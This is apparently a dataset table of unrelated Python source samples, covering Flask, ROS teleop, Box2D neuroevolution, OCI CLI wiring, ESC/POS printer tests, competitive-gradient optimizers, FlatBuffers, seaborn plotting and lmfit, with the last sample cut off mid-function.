| content (string, lengths 0 to 1.05M) | origin (2 classes) | type (2 classes) |
|---|---|---|
from flask import Flask
app = Flask(__name__)
@app.route('/hello/<name>')
def hello(name: str) -> str:
return f"Hello {name}!"
| nilq/baby-python | python |
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
import sys, select, termios, tty
msg = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving options:
---------------------------
w -- forward (+x)
s -- backward (-x)
a -- left (+y)
d -- right (-y)
up arrow -- up (+z)
down arrow -- down (-z)
left arrow -- counter-clockwise yaw
right arrow -- clockwise yaw
CTRL-C to quit
"""
print msg
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.2)
if rlist:
key = sys.stdin.read(1)
### if using arrow keys, need to retrieve 3 keys in buffer
if ord(key) == 27:
key = sys.stdin.read(1)
if ord(key) == 91:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('teleop_twist_keyboard')
pub = rospy.Publisher('~cmd_vel', Twist, queue_size = 1)
v = rospy.get_param("~v", 2.0)
w = rospy.get_param("~w", 1.0)
    rate = rospy.Rate(20) # 20 Hz
while not rospy.is_shutdown():
vx = 0
vy = 0
vz = 0
wy = 0
key = getKey()
if key == 'w':
vx = v
elif key == 's':
vx = -v
elif key == 'a':
vy = v
elif key == 'd':
vy = -v
elif key=='A':
vz = v
elif key=='B':
vz = -v
elif key=='C':
wy = -w
elif key=='D':
wy = w
if (key == '\x03'):
break
twist = Twist()
twist.linear.x = vx; twist.linear.y = vy; twist.linear.z = vz;
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = wy
pub.publish(twist)
rate.sleep()
| nilq/baby-python | python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from Box2D.b2 import contactListener
from parameters import *
from creatures import Animatronic
class nnContactListener(contactListener):
def __init__(self):
contactListener.__init__(self)
self.sensors = dict()
def BeginContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 1.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = True
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 1.0
elif isinstance(f2.userData, Animatronic):
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = True
def EndContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 0.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = False
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 0.0
elif isinstance(f2.userData, Animatronic) and f2.userData.body.fixtures: # Weird
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = False
def registerSensors(self, id, n):
"""
Args:
id: Animatronic unique identifier
            n: number of sensors to register
"""
self.sensors[id] = [0.0]*(n+1) # Last slot for body touching ground
def unregisterSensors(self, id):
del self.sensors[id]
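# Illustrative hookup sketch (not part of the original module; the creature id and sensor
# count are hypothetical): attach the listener to a Box2D world and register one
# creature's contact sensors by id.
def _example_listener_hookup():
    from Box2D import b2World
    listener = nnContactListener()
    world = b2World(gravity=(0, -10), doSleep=True)
    world.contactListener = listener           # Box2D calls Begin/EndContact on it
    listener.registerSensors("creature-1", 4)  # 4 sensor slots + 1 extra for the body
    return world, listener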
def breed(creatures):
    # Breed every unordered pair: p1 with each later creature, then recurse on the tail.
if len(creatures) < 2:
return []
offspring = []
p1 = creatures[0]
for p2 in creatures[1:]:
offspring.append(p1.breed(p2))
return offspring + breed(creatures[1:])
def cross(array1, array2):
assert(array1.shape == array2.shape)
new_list = []
a1, a2 = array1.flat, array2.flat
for i in range(array1.size):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_list.append(a1[i])
if r == 1:
# inherit from second parent
new_list.append(a2[i])
return np.array(new_list).reshape(array1.shape)
def cross2(array1, array2):
""" Cross function with whole genes instead of single nucleotides """
assert(array1.shape == array2.shape)
new_array = np.zeros_like(array1)
#a1, a2 = array1.flat, array2.flat
for i in range(array1.shape[1]):
r = np.random.randint(2)
if r == 0:
# inherit from first parent
new_array[:,i] = array1[:,i].copy()
if r == 1:
# inherit from second parent
new_array[:,i] = array2[:,i].copy()
return new_array
def sigmoid(x):
return 1 / (1+np.exp(-x))
def tanh(x):
# Better than sigmoid for our purpose
return (np.exp(x)-np.exp(-x)) / (np.exp(x)+np.exp(-x))
def relu(x):
return np.maximum(x, np.zeros_like(x))
def sigmoid_derivative(x):
return x*(1-x)
class NeuralNetwork:
activations = { "tanh": tanh,
"sigmoid": sigmoid,
"sigmoid_derivative": sigmoid_derivative,
"relu": relu}
def __init__(self):
self.save_state = False # Keep calculated values of neurons after feedforward for display purposes
def init_weights(self, layers):
self.weights = []
for i in range(len(layers)-1):
# Fill neural network with random values between -1 and 1
self.weights.append(np.random.uniform(size=(layers[i]+1, layers[i+1]), low=-1, high=1))
#def set_weights(self, weights):
# self.weights = weights
def set_activation(self, activation):
self.activation = activation.lower()
self.activation_f = self.activations[self.activation]
def get_layers(self):
""" Returns number of neurons in each layer (input and output layers included)
"""
n = len(self.weights)
return [len(self.weights[i])-1 for i in range(n)] + [len(self.weights[-1][0])]
def get_total_neurons(self):
layers = self.get_layers()
return sum(layers)
def get_total_synapses(self):
return sum([w.size for w in self.weights])
def feedforward(self, x):
self.output = np.array(x+[1.0]) # Add the bias unit
if self.save_state:
self.state = []
self.state.append(self.output.copy())
for i in range(0, len(self.weights)-1):
self.output = self.activation_f(np.dot(self.output, self.weights[i]))
self.output = np.append(self.output, 1.0) # Add the bias unit
if self.save_state:
self.state.append(self.output.copy())
self.output = self.activation_f(np.dot(self.output, self.weights[-1]))
if self.save_state:
self.state.append(self.output)
def copy(self):
new_nn = NeuralNetwork()
weights = []
for w in self.weights:
weights.append(w.copy())
new_nn.weights = weights
new_nn.set_activation(self.activation)
return new_nn
def compare_weights(self, other):
assert self.get_layers() == other.get_layers(), "neural network architectures are different"
diff = []
mutations = 0
for i in range(len(self.weights)):
diff.append(self.weights[i] == other.weights[i])
            mutations += int(np.sum(self.weights[i] != other.weights[i]))
        print("{} mutation(s) ({:.2%})".format(mutations, mutations / self.get_total_synapses()))
return diff
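# Illustrative usage sketch (not part of the original module): build two random networks
# with the same architecture, run one forward pass, and cross their first weight matrices
# column-by-column ("gene"-wise) with cross2().
def _example_feedforward_and_cross():
    parent_a = NeuralNetwork()
    parent_a.init_weights([4, 6, 2])            # 4 inputs, 6 hidden units, 2 outputs
    parent_a.set_activation("tanh")
    parent_a.feedforward([0.1, 0.2, 0.3, 0.4])  # result is left in parent_a.output
    parent_b = NeuralNetwork()
    parent_b.init_weights([4, 6, 2])
    parent_b.set_activation("tanh")
    child_first_layer = cross2(parent_a.weights[0], parent_b.weights[0])
    return parent_a.output, child_first_layer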
| nilq/baby-python | python |
# coding: utf-8
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
import click
from services.waas.src.oci_cli_waas.generated import waas_cli
from oci_cli import cli_util
from oci_cli import custom_types # noqa: F401
from oci_cli import json_skeleton_utils
# oci waas purge-cache purge-cache --waas-policy-id, --resources
# to
# oci waas purge-cache --waas-policy-id, --resources
waas_cli.waas_root_group.commands.pop(waas_cli.purge_cache_group.name)
waas_cli.waas_root_group.add_command(waas_cli.purge_cache)
# oci waas custom-protection-rule-setting update-waas-policy-custom-protection-rules --update-custom-protection-rules-details, --waas-policy-id
# to
# oci waas custom-protection-rule update-setting --custom-protection-rules-details, --waas-policy-id
waas_cli.waas_root_group.commands.pop(waas_cli.custom_protection_rule_setting_group.name)
@cli_util.copy_params_from_generated_command(waas_cli.update_waas_policy_custom_protection_rules, params_to_exclude=['update_custom_protection_rules_details'])
@waas_cli.custom_protection_rule_group.command(name=cli_util.override('update_waas_policy_custom_protection_rules.command_name', 'update-setting'), help=waas_cli.update_waas_policy_custom_protection_rules.help)
@cli_util.option('--custom-protection-rules-details', required=True, type=custom_types.CLI_COMPLEX_TYPE, help=u"""""" + custom_types.cli_complex_type.COMPLEX_TYPE_HELP)
@click.pass_context
@json_skeleton_utils.json_skeleton_generation_handler(input_params_to_complex_types={'custom-protection-rules-details': {'module': 'waas', 'class': 'list[CustomProtectionRuleSetting]'}})
@cli_util.wrap_exceptions
def update_waas_policy_custom_protection_rules_extended(ctx, **kwargs):
if 'custom_protection_rules_details' in kwargs:
kwargs['update_custom_protection_rules_details'] = kwargs['custom_protection_rules_details']
kwargs.pop('custom_protection_rules_details')
ctx.invoke(waas_cli.update_waas_policy_custom_protection_rules, **kwargs)
# oci waas waas-policy-custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
# to
# oci waas waas-policy custom-protection-rule list --waas-policy-id, --action, --all-pages, --mod-security-rule-id
waas_cli.waas_root_group.commands.pop(waas_cli.waas_policy_custom_protection_rule_group.name)
waas_cli.waas_policy_group.add_command(waas_cli.waas_policy_custom_protection_rule_group)
cli_util.rename_command(waas_cli.waas_policy_group, waas_cli.waas_policy_custom_protection_rule_group, "custom-protection-rule")
| nilq/baby-python | python |
""""""
from SSNRoom import SSNRoom
import json
class WallRoom(SSNRoom):
def __init__(self, room):
super().__init__(room)
# self._load()
self.wall_store = None
def _load(self):
self.wall_store = json.loads(self.room.topic)
print("hi")
# room_events = self.room.get_events()
# events_ct = len(room_events)
# for i in range(0, events_ct):
# event = room_events.pop()
# if event['type'] == "m.room.message":
# text = event["content"]["body"]
# if "time_of_update" in text:
# wse = json.loads(event["content"]["body"])
# self.wall_store = wse
def get_wall_store(self):
return self.wall_store
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
#
# escpostools/commands/cmd_test.py
#
# Copyright 2018 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import click
from escpostools.aliases import resolve_alias
from escpostools.cli import pass_context
LONG_RULER = '....:....|' * 8
SHORT_RULER = '....:....|' * 4
@click.command('test', short_help='Runs tests against implementations.')
@click.argument('aliases', type=click.STRING)
@click.option('--all', is_flag=True, help='Run all predefined test sets')
@click.option('--align', is_flag=True, help='Run predefined alignment test set')
@click.option('--modes', is_flag=True, help='Run predefined modes test set')
@click.option('--rulers', is_flag=True, help='Run predefined rulers test set')
@pass_context
def cli(ctx, aliases, all, align, modes, rulers):
"""Runs predefined tests against one or more implementations, sending sets
    of commands to the printer(s) through associated connection method(s).
For this command to work you must assign at least one alias with an
implementation and connection method. See help for "assign" command. For
example, if you want to run "modes" and "align" tests against an
implementation aliased as "tmt20" you type:
\b
$ escpos test tmt20 --align --modes
Or you can run all predefined tests against three aliased implementations:
\b
$ escpos test rm22,tmt20,dr700 --all
"""
impls = [resolve_alias(alias_id) for alias_id in aliases.split(',')]
if all:
align = True
modes = True
rulers = True
for impl in impls:
if align:
_run_align(impl)
if modes:
_run_modes(impl)
if rulers:
_run_rulers(impl)
def _run_align(impl):
impl.init()
    impl.text('[Alignment Tests]')
impl.lf()
impl.justify_right()
impl.text('Right Aligned')
impl.justify_center()
impl.text('Centered Text')
impl.justify_left()
impl.text('Left Aligned')
impl.lf(2)
impl.text('This long text paragraph should be left aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_center()
impl.text('This long text paragraph should be centered. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_right()
impl.text('This long text paragraph should be right aligned. The quick brown fox jumps over the lazy dog.')
impl.lf()
impl.justify_left()
impl.lf(2)
def _run_modes(impl):
impl.init()
impl.text('[Modes]')
impl.lf()
impl.text('Just normal text.')
impl.lf()
impl.text('Entering condensed...')
impl.set_condensed(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_condensed(False)
impl.text('Condensed mode OFF')
impl.lf()
impl.text('Entering expanded...')
impl.set_expanded(True)
impl.text('The quick brown fox jumps over the lazy dog.')
impl.set_expanded(False)
impl.text('Expanded mode OFF')
impl.lf(2)
def _run_rulers(impl):
impl.init()
impl.text('[Rulers]')
impl.lf()
impl.text(LONG_RULER)
impl.lf(2)
impl.set_condensed(True)
impl.text(LONG_RULER)
impl.set_condensed(False)
impl.lf(2)
impl.set_expanded(True)
impl.text(SHORT_RULER)
impl.set_expanded(False)
impl.lf(2)
| nilq/baby-python | python |
# This is a preliminary version of the code
from typing import Any
import time
import torch
import numpy
from torch import Tensor
from torch import autograd
from torch.autograd import Variable
from torch.autograd import grad
def hessian_vec(grad_vec, var, retain_graph=False):
v = torch.ones_like(var)
vec, = autograd.grad(grad_vec, var, grad_outputs=v, allow_unused=True, retain_graph=retain_graph)
return vec
def hessian(grad_vec, var, retain_graph=False):
v = torch.eye(var.shape[0])
matrix = torch.cat([autograd.grad(grad_vec, var, grad_outputs=v_row, allow_unused=True, retain_graph=retain_graph)[0]
for v_row in v])
matrix = matrix.view(-1,var.shape[0])
return matrix
class Richardson(object):
def __init__(self, matrix, rhs, tol, maxiter, relaxation, verbose=False):
"""
:param matrix: coefficient matrix
:param rhs: right hand side
:param tol: tolerance for stopping criterion based on the relative residual
:param maxiter: maximum number of iterations
:param relaxation: relaxation parameter for Richardson
        :param verbose: print iteration diagnostics
        The initial guess is passed to solve(), which returns an approximation of matrix**-1 @ rhs.
"""
self.rhs = rhs
self.matrix = matrix
self.tol = tol
self.maxiter = maxiter
self.relaxation = relaxation
self.rhs_norm = torch.norm(rhs, 2)
self.iteration_count = 0
self.verbose = verbose
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, initial_guess):
## TODO: consider passing initial guess to solve()
residual = self.rhs - self.matrix @ initial_guess
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
solution = initial_guess
while relative_residual_norm > self.tol and self.iteration_count < self.maxiter:
## TODO: consider making all of these non-attributes and just return them
solution = solution + self.relaxation * residual
residual = self.rhs - torch.matmul(self.matrix, solution)
residual_norm = residual.norm()
relative_residual_norm = residual_norm / self.rhs_norm
self.iteration_count += 1
self.print_verbose("Richardson converged in ", str(self.iteration_count), " iteration with relative residual norm: ",
str(relative_residual_norm), end='...')
        # Return the last iterate even if maxiter was reached before the tolerance was met
return solution
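# Illustrative sketch (not part of the original file): solve a small, well-conditioned
# 2x2 diagonal system with the Richardson iteration above; relaxation=0.5 converges here.
def _example_richardson():
    A = torch.tensor([[2.0, 0.0], [0.0, 1.0]])
    b = torch.tensor([4.0, 2.0])
    solver = Richardson(A, b, tol=1e-8, maxiter=500, relaxation=0.5, verbose=False)
    return solver.solve(torch.zeros(2))  # expected to approach tensor([2., 2.])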
"""
class Optimizer:
def __init__(self, iteration, tolerance, device="cpu"):
self.iter = iteration
self.tol = tolerance
self.dev = torch.device(device)
def solve(self):
raise NotImplementedError
class SpecialOptimizer(Optimizer):
def __init__(self, *args, **kwargs):
iteration, tolerance = args[:]
device = kwargs.get("device", "cpu")
super(SpecialOptimizer, self).__init__(iteration, tolerance, device=device)
## do something with args and kwargs ...
def solve(self):
pass
"""
class ConjugateGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-18, lr=1.0, verbose=True):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_eval = f(x, y)
g_eval = g(x, y)
grad_f_x = autograd.grad(f_eval, x, create_graph=True, allow_unused=True)
grad_g_y = autograd.grad(g_eval, y, create_graph=True, allow_unused=True)
new_x = x - self.lr * grad_f_x[0]
new_y = y - self.lr * grad_g_y[0]
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradient(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y):
f_history = []
g_history = []
x_history = []
y_history = []
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val = f(x, y)
g_val = g(x, y)
grad_f_x, = autograd.grad(f_val, x, create_graph=True, allow_unused=True)
grad_g_y, = autograd.grad(g_val, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy = hessian_vec(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian_vec(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
# The "*" multiplication operates elementwise
# We have to use the "*" and not the matmul method because we do NOT extract the entire Hessian matrix, we just
# extract the diagonal entries
#__x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_f_xy, __hess_g_yx))
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_f_xy * hess_g_yx)
#__y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(torch.matmul(__hess_g_yx, __hess_f_xy))
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.diag_embed(hess_g_yx * hess_f_xy)
else:
hess_f_xy = hessian(grad_f_x, y, retain_graph=False)
hess_g_yx = hessian(grad_g_y, x, retain_graph=False)
x_rhs = grad_f_x - self.lr * torch.matmul(hess_f_xy, grad_g_y)
y_rhs = grad_g_y - self.lr * torch.matmul(hess_g_yx, grad_f_x)
x_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_f_xy, hess_g_yx)
y_A = torch.eye(x.shape[0]) - self.lr * self.lr * torch.matmul(hess_g_yx, hess_f_xy)
solver1 = Richardson(x_A, x_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_x = torch.randn(x_rhs.shape)
delta_x = solver1.solve(initial_guess_x)
solver2 = Richardson(y_A, y_rhs, 1e-10, 1000, 1, verbose=False)
initial_guess_y = torch.randn(y_rhs.shape)
delta_y = solver2.solve(initial_guess_y)
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy:", hess_f_xy)
self.print_verbose("hess_g_yx:", hess_g_yx)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
return f_history, g_history, x_history, y_history
class CompetitiveGradientJacobi(object):
def __init__(self, nsteps=10, residual_tol=1e-10, lr=1e-3, verbose=True, full_hessian=False):
self.nsteps = nsteps
self.residual_tol = residual_tol
self.lr = lr
self.verbose = verbose
self.full_hessian = full_hessian
self.iter_count = 0
def print_verbose(self, *args, **kwargs):
if self.verbose :
print(*args, **kwargs)
def solve(self, f, g, x, y, delay=1):
x_buffer = []
y_buffer = []
f_history = []
g_history = []
x_history = []
y_history = []
prev_y = y.clone().detach().requires_grad_(True)
prev_x = x.clone().detach().requires_grad_(True)
x_history.append(x)
y_history.append(y)
while self.iter_count < self.nsteps:
self.iter_count += 1
f_val_x = f(x, prev_y)
f_val_y = f(prev_x, y)
g_val_x = g(x, prev_y)
g_val_y = g(prev_x, y)
grad_f_x_x, = autograd.grad(f_val_x, x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_f_x_y, = autograd.grad(f_val_y, prev_x, create_graph=True,
allow_unused=True) # terrible variable name, implies diagonal hessian!!
grad_g_y_x, = autograd.grad(g_val_x, prev_y, create_graph=True, allow_unused=True)
grad_g_y_y, = autograd.grad(g_val_y, y, create_graph=True, allow_unused=True)
if not self.full_hessian:
hess_f_xy_x = hessian_vec(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian_vec(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian_vec(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian_vec(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * hess_f_xy_x * grad_g_y_x)
delta_y = -self.lr * (grad_g_y_y + 2 * hess_g_yx_y * grad_f_x_y)
else:
hess_f_xy_x = hessian(grad_f_x_x, prev_y, retain_graph=False)
hess_f_xy_y = hessian(grad_f_x_y, y, retain_graph=False)
hess_g_yx_x = hessian(grad_g_y_x, x, retain_graph=False)
hess_g_yx_y = hessian(grad_g_y_y, prev_x, retain_graph=False)
delta_x = -self.lr * (grad_f_x_x + 2 * torch.matmul(hess_f_xy_x, grad_g_y_x))
delta_y = -self.lr * (grad_g_y_y + 2 * torch.matmul(hess_g_yx_y, grad_f_x_y))
new_x = x - self.lr * delta_x
new_y = y - self.lr * delta_y
x = new_x.clone().detach().requires_grad_(True)
y = new_y.clone().detach().requires_grad_(True)
x_buffer.append(x)
y_buffer.append(y)
self.print_verbose("######################################################")
self.print_verbose("Iteration: ", self.iter_count)
self.print_verbose("x: ", x)
self.print_verbose("y: ", y)
self.print_verbose("f(x,y): ", f(x, y))
self.print_verbose("g(x,y): ", g(x, y))
self.print_verbose("hess_f_xy_x:", hess_f_xy_x)
self.print_verbose("hess_f_xy_y:", hess_f_xy_y)
self.print_verbose("hess_g_yx_x:", hess_g_yx_x)
self.print_verbose("hess_g_yx_y:", hess_g_yx_y)
self.print_verbose("######################################################")
f_history.append(f(x, y))
g_history.append(g(x, y))
x_history.append(x)
y_history.append(y)
if self.iter_count > delay:
prev_y = y_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
prev_x = x_buffer[self.iter_count - delay].clone().detach().requires_grad_(True)
return f_history, g_history, x_history, y_history
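# Illustrative sketch (not part of the original file; f and g are toy payoffs chosen only
# for this example): run the simple simultaneous-descent solver (ConjugateGradient above)
# on a small two-player problem with one scalar parameter per player.
def _example_two_player_descent():
    x = torch.tensor([3.0], requires_grad=True)
    y = torch.tensor([-1.0], requires_grad=True)
    f = lambda x, y: ((x - 1.0) ** 2 + x * y).sum()   # player 1 minimizes f over x
    g = lambda x, y: ((y + 2.0) ** 2 - x * y).sum()   # player 2 minimizes g over y
    solver = ConjugateGradient(nsteps=5, lr=0.1, verbose=False)
    return solver.solve(f, g, x, y)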
| nilq/baby-python | python |
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: DeepSeaScene
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class SubpassDependency(object):
__slots__ = ['_tab']
@classmethod
def SizeOf(cls):
return 28
# SubpassDependency
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# SubpassDependency
def SrcSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(0))
# SubpassDependency
def SrcStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(4))
# SubpassDependency
def SrcAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(8))
# SubpassDependency
def DstSubpass(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(12))
# SubpassDependency
def DstStages(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(16))
# SubpassDependency
def DstAccess(self): return self._tab.Get(flatbuffers.number_types.Uint32Flags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(20))
# SubpassDependency
def RegionDependency(self): return self._tab.Get(flatbuffers.number_types.BoolFlags, self._tab.Pos + flatbuffers.number_types.UOffsetTFlags.py_type(24))
def CreateSubpassDependency(builder, srcSubpass, srcStages, srcAccess, dstSubpass, dstStages, dstAccess, regionDependency):
builder.Prep(4, 28)
builder.Pad(3)
builder.PrependBool(regionDependency)
builder.PrependUint32(dstAccess)
builder.PrependUint32(dstStages)
builder.PrependUint32(dstSubpass)
builder.PrependUint32(srcAccess)
builder.PrependUint32(srcStages)
builder.PrependUint32(srcSubpass)
return builder.Offset()
| nilq/baby-python | python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_selection import mutual_info_classif
def draw_cat_plot(df: pd.DataFrame, id_var: str, cat_feats: list, *, output_filename: str =None):
"""
Draw plot showing value counts of categorical features.
    :parameter df: pandas dataframe containing the feature `id_var` and all of the features in `cat_feats`.
    Note: this implementation does not check that all of the relevant features are in `df`.
:parameter id_var: Feature name (string) with respect to which panels of the categorical plot
are made. For instance, for a binary feature, the plot will
have two panels showing the respective counts of categorical features.
:parameter cat_feats: list of strings of categorical features to plot.
:parameter output_filename: if the plot is to be saved, this is its name.
(default=None, i.e., plot is not saved)
:return: Seaborn figure object.
"""
# Create DataFrame for cat plot using `pd.melt` using just the values from categorical features
df_cat = pd.melt(df, id_vars=id_var, value_vars=cat_feats)
# Draw the catplot
fig = sns.catplot(x="variable", hue="value", col=id_var, data=df_cat,
kind="count")
fig.set_xlabels('')
fig.set_xticklabels(rotation=90)
    if output_filename is not None:
        fig.savefig(output_filename)
return fig
def draw_corr_matrix(df: pd.DataFrame):
"""
- Draw correlation matrix as heatmap.
- Draw correlation for target feature and mutual information in a bar plot.
Note: Assuming the target feature is in the last column of df.
:parameter df: pandas dataframe with all of the relevant features as columns.
:return: fig: matplotlib figure object;
corr: correlation matrix for all features;
scores: pandas dataframe with the correlation and mutual information scores
for the target feature.
"""
target = df.columns[-1]
corr = df.corr() # Calculate the correlation matrix
target_corr = corr.loc[target, corr.columns.delete(-1)] # Correlation for the target
mi = mutual_info_classif(df.iloc[:, :-1], df[target]) # Calculate MI score
scores = target_corr.to_frame()
scores.rename(columns={target: "Corr"}, inplace=True)
scores["MI"] = mi
scores_melted = pd.melt(scores, ignore_index=False)
mask = np.zeros_like(corr)
mask[np.triu_indices_from(mask)] = True # Generate a mask for the upper triangle
fig, ax = plt.subplots(2, 1, figsize=(8, 15), dpi=100)
sns.heatmap(corr, mask=mask, square=True, ax=ax[0], cmap='Spectral_r',
annot=True, fmt='.2f', annot_kws={'fontsize': 8})
ax[0].set_title("Feature Correlation", fontdict={"fontsize": 14})
    # Plot the target correlation and mutual information scores on the same graph.
sns.barplot(x="value", y=scores_melted.index, hue="variable",
data=scores_melted, ax=ax[1], palette='crest')
# sns.barplot(x=[np.array(cardio_corr), mi], y=cardio_corr.index, ax=ax[1],
# color=[0.30, 0.41, 0.29]) # to plot just the "Cardio" correlation scores
ax[1].set_title(f"Target ({target}) Correlation and Mutual Information",
fontdict={"fontsize": 14})
ax[1].set_xlabel(None)
ax[1].legend(title=None)
ax[1].grid(axis='x')
fig.savefig('Corr_matrix_Target.png')
return fig, corr, scores
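# Illustrative sketch (not part of the original module; the column names are made up):
# exercise both helpers on a small synthetic dataframe whose last column ("cardio") is the
# binary target.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    demo = pd.DataFrame({
        "smoke": rng.integers(0, 2, 200),
        "alco": rng.integers(0, 2, 200),
        "active": rng.integers(0, 2, 200),
        "cardio": rng.integers(0, 2, 200),
    })
    draw_cat_plot(demo, id_var="cardio", cat_feats=["smoke", "alco", "active"])
    draw_corr_matrix(demo)  # also writes Corr_matrix_Target.png, as coded above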
| nilq/baby-python | python |
import numpy as np
from lmfit import Parameters, minimize, report_fit
from lmfit.models import LinearModel, GaussianModel
from lmfit.lineshapes import gaussian
def per_iteration(pars, iter, resid, *args, **kws):
"""iteration callback, will abort at iteration 23
"""
# print( iter, ', '.join(["%s=%.4f" % (p.name, p.value) for p in pars.values()]))
return iter == 23
def test_itercb():
x = np.linspace(0, 20, 401)
y = gaussian(x, amplitude=24.56, center=7.6543, sigma=1.23)
y = y - .20*x + 3.333 + np.random.normal(scale=0.23, size=len(x))
